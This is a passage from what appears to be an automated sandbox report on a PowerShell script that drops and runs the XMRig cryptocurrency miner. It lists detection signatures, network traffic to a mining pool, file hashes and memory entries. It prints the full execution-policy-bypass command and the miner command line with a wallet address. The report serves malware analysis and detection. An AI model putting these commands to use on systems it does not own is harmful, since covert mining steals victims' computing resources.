N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1428-4-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-5-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-6-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-7-0x0000022C3B030000-0x0000022C3B052000-memory.dmp

memory/1428-10-0x0000022C3B360000-0x0000022C3B3D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfzcyjqs.y4h.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1428-25-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-48-0x0000022C3B3E0000-0x0000022C3B3F2000-memory.dmp

memory/1428-61-0x0000022C3B340000-0x0000022C3B34A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3688-90-0x0000013AA9890000-0x0000013AA98B0000-memory.dmp

memory/1428-91-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/3688-92-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/1428-93-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-94-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/3688-95-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-96-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-97-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-98-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-99-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-100-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-101-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-102-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-103-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-104-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-105-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-106-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-107-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-108-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-109-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-110-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-111-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-112-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-113-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-114-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-115-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-116-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-117-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-118-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-119-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-120-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-121-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-122-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-123-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-124-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-125-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-126-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-127-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-128-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-129-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-130-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-131-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-132-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-133-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-134-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-135-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-136-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-137-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-138-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-139-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-140-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-141-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-142-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-143-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-144-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-145-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-146-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-147-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-148-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-149-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-150-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-151-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-152-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-153-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-154-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-155-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-156-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:29

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/2768-2-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/2768-5-0x00000227B7980000-0x00000227B79A2000-memory.dmp

memory/2768-6-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-9-0x00000227B7B60000-0x00000227B7BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ntk3alp4.pyc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2768-10-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-25-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-48-0x00000227B7B20000-0x00000227B7B32000-memory.dmp

memory/2768-61-0x00000227B79B0000-0x00000227B79BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1632-90-0x000001AA464A0000-0x000001AA464C0000-memory.dmp

memory/1632-91-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/2768-93-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/1632-92-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/2768-94-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/1632-95-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-96-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-97-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-98-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-99-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-100-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-101-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-102-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-103-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-104-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-105-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-106-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-107-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-108-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-109-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-110-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-111-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-112-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-113-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-114-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-115-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-116-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-117-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-118-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-119-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-120-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-121-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-122-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-123-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-124-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-125-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-126-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-127-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-128-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-129-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-130-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-131-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-132-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-133-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-134-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-135-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-136-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-137-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-138-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-139-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-140-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-141-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-142-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-143-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-144-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-145-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-146-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-147-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-148-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-149-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-150-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-151-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-152-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-153-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-154-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-155-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:29

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
NL 23.62.61.163:443 www.bing.com tcp
US 8.8.8.8:53 163.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/3248-0-0x00007FFE97363000-0x00007FFE97365000-memory.dmp

memory/3248-3-0x00000268E86F0000-0x00000268E8712000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cfnwiekg.eu4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3248-11-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/3248-12-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/3248-14-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/3248-15-0x00000268E9590000-0x00000268E95A2000-memory.dmp

memory/3248-16-0x00000268E9570000-0x00000268E957A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1528-47-0x000001B93AE10000-0x000001B93AE30000-memory.dmp

memory/1528-48-0x000001B93AE50000-0x000001B93AE70000-memory.dmp

memory/1528-49-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/3248-50-0x00007FFE97363000-0x00007FFE97365000-memory.dmp

memory/1528-51-0x000001B93AE70000-0x000001B93AE90000-memory.dmp

memory/1528-52-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/3248-53-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/1528-54-0x000001B93AE90000-0x000001B93AEB0000-memory.dmp

memory/3248-55-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp

memory/1528-56-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-58-0x000001B93AE70000-0x000001B93AE90000-memory.dmp

memory/1528-57-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-59-0x000001B93AE90000-0x000001B93AEB0000-memory.dmp

memory/1528-60-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-61-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-62-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-63-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-64-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-65-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-66-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-67-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-68-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-69-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-70-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-71-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-72-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-73-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-74-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-75-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-76-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-77-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-78-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

memory/1528-79-0x00007FF77EB60000-0x00007FF77F793000-memory.dmp

